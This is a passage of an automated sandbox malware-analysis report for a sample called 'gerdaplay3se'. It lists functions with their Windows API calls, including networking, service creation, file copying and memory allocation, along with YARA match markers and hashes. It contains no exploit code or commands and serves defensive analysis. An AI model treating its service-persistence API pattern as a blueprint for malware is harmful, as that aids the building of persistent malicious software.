Function 02D68321 Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000), ref: 02D6833E
shutdown.WS2_32(?,00000002), ref: 02D68347

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ErrorLastshutdown
String ID:
API String ID: 1920494066-0
Opcode ID: 563d45eb4a99d6c7f1934e24f46eafb52384a1d1526a5eac98a92dc116b1fa0f
Instruction ID: eaea064ac1e687da28e8d44a883d36b305dad2e32f05d735f064e7aafda5c22a
Opcode Fuzzy Hash: 563d45eb4a99d6c7f1934e24f46eafb52384a1d1526a5eac98a92dc116b1fa0f
Instruction Fuzzy Hash: 70F03075A44314CFD7109F58D809B6AB7E5FF49321F148859E9AAD7380E734AC10CBA2

Function 004039F0 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01

Part of subcall function 004038A8: GetVersionExA.KERNEL32 ref: 004038C7

HeapDestroy.KERNEL32 ref: 00403A40

Part of subcall function 00403DC7: HeapAlloc.KERNEL32(00000000,00000140,00403A29,000003F8), ref: 00403DD4

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
Instruction ID: 5dadef9d12e489db140da5c14b34350ea54a5b880f3286d9e4ff1a1591b79aa3
Opcode Fuzzy Hash: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
Instruction Fuzzy Hash: 04F065707553016ADB24EF705E4676B3DD8AB80B53F10443BF541F41E0EB7C8690991A

Function 00402159 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 0040B01F

Strings

D*X, xrefs: 0040B02B

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: AllocVirtual
String ID: D*X
API String ID: 4275171209-1444360580
Opcode ID: be1b60655502a77b438630a159cfee42b780d1365d365f0ee256d249edeebfcc
Instruction ID: 674bc1e357348befb5f5fc749722f203f51b8d7df494d28343854b05007eaf87
Opcode Fuzzy Hash: be1b60655502a77b438630a159cfee42b780d1365d365f0ee256d249edeebfcc
Instruction Fuzzy Hash: 95C012319045229BC6104B51494566B3EA4EB04795F210023661777590C3340855E7DE

Function 004021A8 Relevance: 3.0, APIs: 2, Instructions: 6registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE ref: 004021A8
SetEvent.KERNEL32 ref: 0040B336

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: CloseEvent
String ID:
API String ID: 2624557715-0
Opcode ID: 1d40515ab81c1b4ce9161d0b62d2b317b993b1fd18fa1490a0364b441aac4561
Instruction ID: 6f1d786c59d975fdae9e5444acb986478cecb304cabaf29a0616b0b08fc8c14e
Opcode Fuzzy Hash: 1d40515ab81c1b4ce9161d0b62d2b317b993b1fd18fa1490a0364b441aac4561
Instruction Fuzzy Hash: 20B0923144C001EFC6405BA0EF4C42A3AA9B6093013210031A307700A0C7351021EB1E

Function 02D65119 Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D6511E

Part of subcall function 02D63D7E: htons.WS2_32(?), ref: 02D63DA2
Part of subcall function 02D63D7E: htonl.WS2_32(00000000), ref: 02D63DB9
Part of subcall function 02D63D7E: htonl.WS2_32(00000000), ref: 02D63DC0

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: htonl$H_prologhtons
String ID:
API String ID: 4039807196-0
Opcode ID: f8f2ad17d827019e4563cae2e953380032b42e0e079de487432fdaf11eac9580
Instruction ID: 64427dc7ce571648951df18ce467fff5a5fed8daf3fc0d3b6d98732de226b8f0
Opcode Fuzzy Hash: f8f2ad17d827019e4563cae2e953380032b42e0e079de487432fdaf11eac9580
Instruction Fuzzy Hash: 698124B1D0424A8FCF05DFA8E094AEEBBB5EF48210F14819AD855B7340EB356A49CF74

Function 02D6E8F8 Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D6E8FD

Part of subcall function 02D61A01: TlsGetValue.KERNEL32 ref: 02D61A0A

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: H_prologValue
String ID:
API String ID: 3700342317-0
Opcode ID: d756ac463005f617aac705bf8bbc24b3f9c12311caee444bc4c4e0d9ebcaa535
Instruction ID: 184abf255d33867be6a91f60a25f76970abea044072a35552eb8fcd56afa0c8e
Opcode Fuzzy Hash: d756ac463005f617aac705bf8bbc24b3f9c12311caee444bc4c4e0d9ebcaa535
Instruction Fuzzy Hash: 5A213BB690420AAFDB00DFA4D444AFEBBF9EF49310F14812AE918A7340D771AD01CBB1

Function 02D633B2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D633CC

Part of subcall function 02D632AB: __EH_prolog.LIBCMT ref: 02D632B0
Part of subcall function 02D632AB: RtlEnterCriticalSection.NTDLL(?), ref: 02D632C3
Part of subcall function 02D632AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D632EF

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
String ID:
API String ID: 1518410164-0
Opcode ID: 321693a88cc245e3bafba647e25668c00f7ac7787f342ca95d39e9c935e3162e
Instruction ID: b53e0f585e14d3b9b094a4a6993abbf93d1b269d10bb34932147f4244047c647
Opcode Fuzzy Hash: 321693a88cc245e3bafba647e25668c00f7ac7787f342ca95d39e9c935e3162e
Instruction Fuzzy Hash: 79016170214606AFD7048F59D889F65B7A9FF44320F24835AE868873C0EB30EC11CBA0

Function 02D6E488 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D6E48D

Part of subcall function 02D626DB: RtlEnterCriticalSection.NTDLL(?), ref: 02D62706
Part of subcall function 02D626DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D6272B
Part of subcall function 02D626DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D85A93), ref: 02D62738
Part of subcall function 02D626DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D62778
Part of subcall function 02D626DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D627D9

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
String ID:
API String ID: 4293676635-0
Opcode ID: fa325516c52515d7c105be846d234b0c03c6433938dc1d7de74e8c40ffd35945
Instruction ID: b2f56e0c54d8989cfc77c5fcef4595ce2602b92089c497b0636e2d1908f50ee4
Opcode Fuzzy Hash: fa325516c52515d7c105be846d234b0c03c6433938dc1d7de74e8c40ffd35945
Instruction Fuzzy Hash: 2001D0B0910B048FC718DF5AC544986FBF5EF88310B05C5AE94498B761E370DA40CFA0

Function 00402332 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32 ref: 0040B11E

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 4312c6114a202acfc17eefa4afbc658a93dcc948a6679b20c1be7a6e01a81c79
Instruction ID: 55e69cf7c3205d098075f1ef4c4825cc47ed66c09711a6d4786e40eacee8f8a0
Opcode Fuzzy Hash: 4312c6114a202acfc17eefa4afbc658a93dcc948a6679b20c1be7a6e01a81c79
Instruction Fuzzy Hash: 52D0927278D115EAD55005986EAEA77624CE78839AB340833A207B61C182FE8446A1AF

Function 02D6E267 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D6E26C

Part of subcall function 02D73A8F: _malloc.LIBCMT ref: 02D73AA7

Part of subcall function 02D6E488: __EH_prolog.LIBCMT ref: 02D6E48D

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: H_prolog$_malloc
String ID:
API String ID: 4254904621-0
Opcode ID: 52eb48d2b86f141bf39dbdac1c8576da31b900b326c17a4143ae813f64e615d6
Instruction ID: 73c0f14f6e7fd9ccaec50b2620485379fa9f4a2ce5b7ef4dc9774c11399e3f36
Opcode Fuzzy Hash: 52eb48d2b86f141bf39dbdac1c8576da31b900b326c17a4143ae813f64e615d6
Instruction Fuzzy Hash: A3E0CD70A051055BDF0DEFA8E80177D7766DB08300F00416DB408D2740DB70DD008A60

Function 02D73395 Relevance: 1.5, APIs: 1, Instructions: 19COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02D75B9A: __getptd_noexit.LIBCMT ref: 02D75B9B
Part of subcall function 02D75B9A: __amsg_exit.LIBCMT ref: 02D75BA8

Part of subcall function 02D733D6: __getptd_noexit.LIBCMT ref: 02D733DA
Part of subcall function 02D733D6: __freeptd.LIBCMT ref: 02D733F4
Part of subcall function 02D733D6: RtlExitUserThread.NTDLL(?,00000000,?,02D733B6,00000000), ref: 02D733FD

__XcptFilter.LIBCMT ref: 02D733C2

Part of subcall function 02D78CD4: __getptd_noexit.LIBCMT ref: 02D78CD8

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
String ID:
API String ID: 1405322794-0
Opcode ID: bbd6c98bf13135d86e12253a9e123cfdd9919e7a9519f495c49ac25897fc4dbe
Instruction ID: 630c5bfb94863845bf0b9f0a328ecf90b01efcdf14e4e5bcec3df8cc5d5feed1
Opcode Fuzzy Hash: bbd6c98bf13135d86e12253a9e123cfdd9919e7a9519f495c49ac25897fc4dbe
Instruction Fuzzy Hash: 61E0ECB1945605DFEB08BBA0D909F6E7776EF45302F200188E1029B360EB799D40AF31

Function 004026D6 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 004026D6

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 0f0cca2a6aecdbe056089abd869a91924bc3b5783ab3fdd70ed22ce2aaf3f922
Instruction ID: 3cd76435cd1bf139601aa08b14a54904b28d8d0ad8e68c1ca0bfa51a29fee9e9
Opcode Fuzzy Hash: 0f0cca2a6aecdbe056089abd869a91924bc3b5783ab3fdd70ed22ce2aaf3f922
Instruction Fuzzy Hash: 3CC01231709001DAC7104F986BEC4686298A1843567300C37D207F11D0C1BA4D06652E

Function 004025C7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE ref: 0040B107

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: df666fc502ade0904578102425999ea0927b9f00e6a2c316619051f88a11ad6d
Instruction ID: 71643fb07f78fec73aeb73823573a7f75fd60fc4bda966918bfa20a3da973925
Opcode Fuzzy Hash: df666fc502ade0904578102425999ea0927b9f00e6a2c316619051f88a11ad6d
Instruction Fuzzy Hash: B4C04C301DE661BAD10252601D6D86A192858063453210073B202FA0D182FC0717A27F

Function 0040B8DC Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNELBASE ref: 0040B8DC

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6e5f3b25cd2b540753a641dcc8df6c5fb52c16c6b4820e0ccc2656478566ffdf
Instruction ID: a210966bc73cc5cab0eee629d8072e29fa6397a950e0fae30b08fce87dc579f3
Opcode Fuzzy Hash: 6e5f3b25cd2b540753a641dcc8df6c5fb52c16c6b4820e0ccc2656478566ffdf
Instruction Fuzzy Hash: D9C09231890151CBCB00CFA0D9981197BB1BB0A3027518A6BE862F2284DBB5A0818A8A

Function 0040256B Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE ref: 0040B107

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 78ec478338408ad1c8d86fceb78597eb6c3200674d8e50b2c1fdaa219a013c93
Instruction ID: 5ecf86d6fcc9e0072576bb314e39d51fa2a309ce43e938f39c6c16362cb17b00
Opcode Fuzzy Hash: 78ec478338408ad1c8d86fceb78597eb6c3200674d8e50b2c1fdaa219a013c93
Instruction Fuzzy Hash: ACB0123049E830F6C01157100D6CC5F182C58053893200032B303B40C002FC021292BF

Function 0040B1FE Relevance: 1.5, APIs: 1, Instructions: 5registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(?), ref: 0040B201

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 0619af9ce46f6ba007f113b533e9913df0395168a4f8c105e8de7cd7f2abdc9e
Instruction ID: 135f214858860a95caaf656eb2adbe6d945cd54912c2b765fb7e399feef37828
Opcode Fuzzy Hash: 0619af9ce46f6ba007f113b533e9913df0395168a4f8c105e8de7cd7f2abdc9e
Instruction Fuzzy Hash: E5A01230C95000B7C7021740DE0885CBE646E083003300171B202300F082B610105B19

Function 02D720A0 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 02D71550: OpenEventA.KERNEL32(00100002,00000000,00000000,84A2267A), ref: 02D715F0
Part of subcall function 02D71550: CloseHandle.KERNEL32(00000000), ref: 02D71605
Part of subcall function 02D71550: ResetEvent.KERNEL32(00000000,84A2267A), ref: 02D7160F
Part of subcall function 02D71550: CloseHandle.KERNEL32(00000000,84A2267A), ref: 02D71644

TlsSetValue.KERNEL32(0000002B,?), ref: 02D720EA

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$OpenResetValue
String ID:
API String ID: 1556185888-0
Opcode ID: 1e65a3bc05ec8e50d14594c12640fc846e3e9a6dc7fe364c191e918a1ae4e08b
Instruction ID: c8648986a0bf9343bb45b62eda0410b3756a20ea04600b84be6a52b74ee2944b
Opcode Fuzzy Hash: 1e65a3bc05ec8e50d14594c12640fc846e3e9a6dc7fe364c191e918a1ae4e08b
Instruction Fuzzy Hash: 61014F71A44204ABD710DF59DC45B5ABBB8FB05771F20476AF829D3380E775AD148BA0

Function 0040B4BC Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00401F64: FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
Part of subcall function 00401F64: GetLastError.KERNEL32 ref: 00401F86
Part of subcall function 00401F64: SizeofResource.KERNEL32(00000000), ref: 00401F93

Sleep.KERNELBASE(000007D0,?,0029226D), ref: 0040B801

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: Resource$ErrorFindLastSizeofSleep
String ID:
API String ID: 2659282285-0
Opcode ID: a30d2dc63f565f5f77289b332b500a051927e9fec619ad8cc045ff4e98d544ad
Instruction ID: 039b88a8dcf10f9c244d64d6b241b3a1228976f9836f64239fed7cb20f37302f
Opcode Fuzzy Hash: a30d2dc63f565f5f77289b332b500a051927e9fec619ad8cc045ff4e98d544ad
Instruction Fuzzy Hash: 39D05E3265C202CAD20C221034197341161F748B51F34003FF10B7A1D18EBE0402628F

Function 0040B7AE Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0,?,0029226D), ref: 0040B801

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 71ed06270a55f957fb0ae97acaf2e41d6db21340e7040e3977e60c44980708ad
Instruction ID: 529134bb4be7d436e77b599dc39e4bb55d0dc1ab89edbbba415f2bcaffe7b413
Opcode Fuzzy Hash: 71ed06270a55f957fb0ae97acaf2e41d6db21340e7040e3977e60c44980708ad
Instruction Fuzzy Hash: B5D05EB6948206EAEA002B106A457683124FB08315F642433FA07B61D6DB795442D6DE

Function 00402277 Relevance: 1.3, APIs: 1, Instructions: 14stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNELBASE ref: 00402277
lstrcmpiW.KERNEL32(?,0040715C), ref: 0040B083

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: afc060a1dc9f2c09d52ddf769f7b78e1d9a5007ca048432da7c9afa9c24ed8d5
Instruction ID: 0e5a9f3835fceab65f8161c2ac0e78c46e2dcfbafadd64f81733265e883a368e
Opcode Fuzzy Hash: afc060a1dc9f2c09d52ddf769f7b78e1d9a5007ca048432da7c9afa9c24ed8d5
Instruction Fuzzy Hash: 64D01270D06519EED7106F714A6C2AF7664E914755730487FD813F11C0D7BC41116A6D

Function 0040218F Relevance: 1.3, APIs: 1, Instructions: 10sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 0040218F

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9c80ea6232b6eb2ca8ec1a064af6b754d7b368a06d3accd401c5647994c6c113
Instruction ID: 4dd6e061a2ed90917861212372999b9d1b5613fcf30d17e99f345e0966a7defc
Opcode Fuzzy Hash: 9c80ea6232b6eb2ca8ec1a064af6b754d7b368a06d3accd401c5647994c6c113
Instruction Fuzzy Hash: 5EC04C75989601A7C2013AA16E45BB4B624E70D319F2450366607304E197796126A6DF

Function 0040B5D9 Relevance: 1.3, APIs: 1, Instructions: 8sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0,?,0029226D), ref: 0040B801

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 94d9deb5d794199e98e93e1f5b18ef859441c1898a632bacdd8ea4d66eb887a1
Instruction ID: 5785da175a53eedf82b78341746dfd2aafd78d5412f9d825c06b865f4fdbab56
Opcode Fuzzy Hash: 94d9deb5d794199e98e93e1f5b18ef859441c1898a632bacdd8ea4d66eb887a1
Instruction Fuzzy Hash: 07C09271998602EAD24427507A49B343230FB44B42FB4113BB603764E28BBE0403BADF

Non-executed Functions

Function 0040270C Relevance: 4.5, APIs: 3, Instructions: 13serviceCOMMON

Download Yara Rule

APIs

CreateServiceA.ADVAPI32 ref: 0040270C
CloseServiceHandle.ADVAPI32(?), ref: 0040B411
CloseServiceHandle.ADVAPI32(00000000), ref: 0040B86E

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: Service$CloseHandle$Create
String ID:
API String ID: 2095555506-0
Opcode ID: 8282fb0c9cfcdb19bba24561d8ecf29e5b81246dde775ad19adb4ef11915ab64
Instruction ID: e72162baefc81ba72820ea022bb1d37a2cc7e083464921caf7f039fb4e03aedc
Opcode Fuzzy Hash: 8282fb0c9cfcdb19bba24561d8ecf29e5b81246dde775ad19adb4ef11915ab64
Instruction Fuzzy Hash: E3D0C731844015EBCF159FA15F4841D7A35E7403417224472E103761E1C73A5F26BEAE

Function 02D708B8 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D708E2
GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D708EA

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
Instruction ID: 2ffc560491db4ae4d9596ce75569c534aae23fe962c7b781686f826c6ac2b36a
Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
Instruction Fuzzy Hash: 70F09A30208301CFEB24CE25C851B2EBBE4AB9C745F54092DF596A22D1E374E981CB6A

Function 02D79468 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,02D74DD6,?,?,?,00000001), ref: 02D7946D
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02D79476

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e06ed100e4bd6c8998d880194c8b835730ce5c7439a983cdd29830e0eb8297ac
Instruction ID: 83bf20bdbba7bb536eb4eb3a1488717098c1b53b8ff157353c5da5a46865c067
Opcode Fuzzy Hash: e06ed100e4bd6c8998d880194c8b835730ce5c7439a983cdd29830e0eb8297ac
Instruction Fuzzy Hash: 70B09239494208EBEB012B91EC09B89BF38FB04762F304810F61D44250CB6258209AA2

Function 02D6F792 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02D6F7A6

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
Instruction ID: 75a5b46eb412bad3110e6fd7fa02d7b4e1e19f2ecc75d69f99dc5522c812ff6f
Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
Instruction Fuzzy Hash: A2F082B1904309ABD700DF95D946B9DFBB9EF44314F208179D508A7340F6707E118B94

Function 0040254E Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040B728

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: CtrlDispatcherServiceStart
String ID:
API String ID: 3789849863-0
Opcode ID: deec43b8dcc897605fa050e878db13adb1085b9c2442af474a0c99484f8a22c2
Instruction ID: 2c378dae27369dad1c58bd9ba8a5e02095a08d98542137ac852fb368b363cb6f
Opcode Fuzzy Hash: deec43b8dcc897605fa050e878db13adb1085b9c2442af474a0c99484f8a22c2
Instruction Fuzzy Hash: 32D0A7B504C2C2DFC306876404088793F38784A25130606D3C0835A297D339415A83B7

Function 02D64603 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 442networkCOMMON

